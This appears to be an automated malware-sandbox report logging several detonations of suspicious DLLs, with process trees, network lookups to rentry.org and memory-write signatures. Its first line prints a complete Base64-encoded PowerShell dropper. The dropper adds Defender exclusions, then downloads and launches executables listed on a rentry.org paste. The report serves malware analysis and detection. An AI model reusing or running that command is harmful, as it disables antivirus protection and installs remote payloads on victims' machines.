"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
Files
memory/1996-0-0x000007FEF56F3000-0x000007FEF56F4000-memory.dmp
memory/1996-1-0x0000000000FC0000-0x0000000000FC8000-memory.dmp
memory/2776-6-0x0000000002C70000-0x0000000002CF0000-memory.dmp
memory/2776-7-0x000000001B580000-0x000000001B862000-memory.dmp
memory/2776-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp
memory/2776-9-0x0000000002C70000-0x0000000002CF0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win7-20240221-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\eventlog_provider.dll,#1
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win7-20240508-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2036 wrote to memory of 2760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2036 wrote to memory of 2760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2036 wrote to memory of 2760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2036 -s 80
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:20
Platform
win7-20231129-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2268 wrote to memory of 804 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2268 wrote to memory of 804 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2268 wrote to memory of 804 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2268 -s 88
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-28 15:20
Reported
2024-05-28 15:25
Platform
win10v2004-20240426-en
Max time kernel
93s
Max time network
206s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |